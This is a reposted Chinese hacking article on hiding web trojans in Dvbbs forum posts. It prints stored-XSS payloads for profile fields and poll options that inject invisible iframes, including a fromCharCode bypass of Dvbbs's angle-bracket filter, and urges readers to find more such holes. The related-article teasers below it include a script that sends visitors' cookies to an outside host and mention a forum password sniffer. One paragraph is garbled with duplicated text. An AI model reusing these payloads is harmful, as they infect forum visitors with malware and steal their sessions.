新思路现动网新漏洞

作者:优格GXU 文章来源:邪恶八进制信息安全团队

文章作者:优格[GXU] (www.wuzhou.org)

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

原文下载:http://www.wuzhou.org/dvbbs.doc

前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了。正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知。

相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码:

</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org"></IfraMe>

在MSN中写入代码:

<Script Language=JavaScript>var actioninfo3='单帖屏蔽'

其中木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。 href="http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。/" target=_blank>http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。

首先,我们发表一个投票看看。如图1

我们看一下源文件:

<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>

其中ssssssssss是我们自由写入的,那么我们能不能对源文件进行欺骗,从而让它运行我们的代码呢?打个比方,一个括号:(),当我们在()内写进)和(,那就变成了两个括号。道理是相同的,我们也可以这样进行代码欺骗。我们在发表投票中写入:

';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='

在这里顺便说一下,动网的投票功能没有进行严密的过滤,当写入的投票项目为网页代码时,代码照样可以执行,而且写入的代码并不按照它所说的“每行一个投票项目,最多10个”,并没有分行。发表投票后,查看源文件:

<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>

代码是无法执行的,动网进行了过滤。再次饶过思路,动网只是对<和>进行过滤,对+'/等符号没有过滤。再次在投票那写入代码:

';document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.wuzhou.org width=0'+String.fromCharCode(62)+String.fromCharCode(60)+'/IFRAME'+String.fromCharCode(62);var vote='1

发表后成功跳转了www.wuzhou.org这个站。如果我们把站改成我们的网页木马,那么一个木马贴就这样完成了。其实这只是动网代码欺骗的一小部分,还有不少的地方可以进行代码欺骗,比如用户头像,联系方法等。

后记:现在很多的程序作者并没有看到到代码欺骗这安全危害,在我看的很多网站程序,不管是asp还是php的,都有许多程序可以进行代码欺骗,希望这篇文章能起到抛砖引玉的效果,让各位朋友找到更多的漏洞。

(0)

相关推荐

  • 新思路现动网新漏洞

    作者:优格GXU 文章来源:邪恶八进制信息安全团队 文章作者:优格[GXU] (www.wuzhou.org) 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 原文下载:http://www.wuzhou.org/dvbbs.doc 前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了.正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知. 相信大家都看过<终结动网最新挂马方法!>的文章了,其实这个漏洞已经出现了大概半月了,

  • 动网7.x权限提升漏洞原理

    在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文,说是admin_postings.asp文件存在注入漏洞,但利用的前提是拥有超级版主或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞, 正好可以结合起来利用.这个前台权限提升漏洞对7.x的Access和 SQL版都有效.下面我们就以7.0 SP2 SQL版,讲解这个漏洞的利用. 漏洞分析: 我们知道动网是通过GroupID来判断当前用户所在的组的,然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢?让

  • 动网dvbbs7.1论坛权限提升漏洞及防范(图)

    在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文,说是admin_postings.asp文件 存在注入漏洞,但利用的前提是拥有超级斑竹或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞, 正好可以结合起来利用.这个前台权限提升漏洞对7.x的Access和 Sql版都有效.下面我们就以7.0 sp2 sql版,讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的,然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢?让

  • 最新版本的动易+动网+oBlog三站整合方法

    我用的是最新版本的动易PE_2006_SP5 +动网dvbbs7.1.0 + oBlog 4.0.  我的测试情况:1.可以同步注册.2.可以同步删除用户ID.3.不像帖子里说的可以同步登陆.(可能是我的COOKIES问题,有在用的测试一下哈)4.可以同步修改密码. 1.准备工作,下载并安装三个系统,并使各自均能独立运行. (1).打开动易压缩包 PowerEasy_CMS2006_SP4_Express.rar或PowerEasy_eShop2006_SP4_Express.rar,运行Pow

  • 问题收集帖动网论坛完整程序包下载地址(包含所有补丁)

    问题收集帖动网论坛完整程序包下载地址(包含所有补丁) Dvbbs7.1.0_Ac.exe 动网论坛完整程序包下载地址(包含所有补丁) Dvbbs7.1.0_Ac.exe动网论坛[05.23]更新补丁下载地址 Q20060430.exe(含重要更新) 为什么我用了5.1的更新后,不能播放多媒体文件,变成乱码了?进入论坛后台--基本设置--系统设置脚本扩展过滤设置里含对"object"或"EMBED"的过滤,此过滤现在可以去掉了,因为新的机制已经对它做了过滤,将这里改为

  • ASP个人网站与动网整合非官方方法

    虽然动网已提供有详细的"动网论坛系统Api接口开发人员指南",但像我这样的菜鸟一时半会可是参详不透的,汗.不甘心,在对其登录.验证等函数进行一番研究再加以测试后最终竟也小有所成,菜鸟也有菜鸟的办法: 本次测试的论坛版本为Version 7.1.0 Sp1,未对其他版本做进行测试 一.网站文件结构 wwwroot    ┝ index.asp    ┝ CheckUserLogin.asp    ┕ bbs/ 二.整合原理 对于同步更新实现不困难,整合主要问题就是难在同步登录,所以我们的

  • ASP类型网站结合动网论坛会员的方法第1/3页

    个人网站如有会员注册模块+动网论坛的话,那网站要与动网论坛系统整合,实现不同Web系统之间的用户信息同步更新.登录等操作就不是件容易的事了,虽然动网已提供有详细的"动网论坛系统Api接口开发人员指南",但像我这样的菜鸟一时半会可是参详不透的,汗.不甘心,在对其登录.验证等函数进行一番研究再加以测试后最终竟也小有所成,菜鸟也有菜鸟的办法,哈哈. 一.网站文件结构 wwwroot   ┝ index.asp   ┝ CheckUserLogin.asp   ┕ bbs/ 二.整合原理 对于

  • 关于动网的cookie泻露站点绝路径的问题

    一.跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: <script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 得到url为UploadFile/2005-6/200562716565777847.jpg 图二则是偶的个人照 U

  • 为动网论坛添加一个密码嗅探器(DVBBS)

    动网先锋论坛,凭借其强大全面的功能,再加上它免费提供给个人用户,在网络众多论坛中,独树一帜.很多人都把它作为自己论坛的最佳首选.但是新版本的论坛,对用户密码采用了不可逆的MD5加密,即使是管理员,也无法查询到个人用户的密码.再数据库中只能查询了加密后的结果. 先描述一下它得登陆过程,用户输入帐号后号,调用MD5函数,输入的密码加密,然后比较存储在数据库的数据和密码加密的结果是否相同.如果相同,登陆成功,将个人信息保存在COOKIE中. 现在我们要自己动手,为论坛增加一项记录密码的功能. 查看它登

  • 动网论坛验证码改进 加法验证码(ASPJpeg版)

    来看看效果图对比:字符验证码: → 加法验证码:优点: ①与纯字符验证码相比,本程序效防止了绝大部分(99%以上)广告机的自动识别.即使是中文验证码,也能被市面上的部分广告机识别. ②与中文验证码相比,避免了用户输入用户名密码验证码的时候需要切换输入法的麻烦. 有兴趣的朋友,还可以扩展为其他的运算,比如乘法,减法,乘方等. 使用方法:将以下代码保存为Dv_GetCode.asp文件,替换动网论坛的该文件.背景色.字体颜色可在代码中修改. 说明:该程序需要网站空间支持ASPJpeg组件.楷体_GB

随机推荐